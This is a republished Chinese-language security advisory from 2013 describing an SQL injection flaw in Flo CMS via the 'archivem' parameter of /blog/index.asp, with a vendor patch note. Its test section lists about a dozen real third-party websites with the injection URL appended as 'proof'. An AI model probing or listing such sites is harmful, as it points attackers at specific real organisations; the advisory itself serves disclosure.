Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Flo CMS “archivem” SQL注入漏洞

发布日期:2013-09-05
更新日期:2013-09-08受影响系统:
Flo CMS Flo CMS
描述:
--------------------------------------------------------------------------------
Flo CMS是内容管理系统。Flo CMS没有正确过滤/blog/index.asp的"archivem" GET参数,远程攻击者通过注入任意SQL代码,即可利用此漏洞操作SQL查询。<*来源:Ashiyane Digital Security Team
 
  链接:http://secunia.com/advisories/54678/
        http://packetstormsecurity.com/files/123058/Flo-CMS-SQL-Injection.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# [+] Exploit :
#
# [+] Location : [Target]/blog/index.asp?archivem=[Sql Injection]
#
#-------
# Proof:
#-------
#
# http://www.kellschamber.ie/blog/index.asp?archivem="
#
# http://www.locumotion.com/blog/index.asp?archivem="
#
# http://www.tamhnach.org/blog/index.asp?archivem="
#
# http://www.royaltaragolfclub.com/blog/index.asp?archivem="
#
# http://www.thebective.ie/blog/index.asp?archivem="
#
# http://www.slanefarmhostel.ie/blog/index.asp?archivem="
#
# http://www.sandbar.ie/blog/index.asp?archivem="
#
# http://www.recruitmentbureau.com/blog/index.asp?archivem="
#
# http://www.joecurrancommercials.com/blog/index.asp?archivem="
#
# http://www.littonlanetraining.com/blog/index.asp?archivem="
#
# http://www.kentstownmontessori.com//blog/index.asp?archivem="建议:
--------------------------------------------------------------------------------
厂商补丁:Flo CMS
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.flocms.ieCisco Jabber for Windows证书验证安全绕过漏洞(CVE-2013-1228)IBM Security AppScan Enterprise会话固定漏洞(CVE-2013-2997)相关资讯      Flo CMS  Flo CMS安全漏洞  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅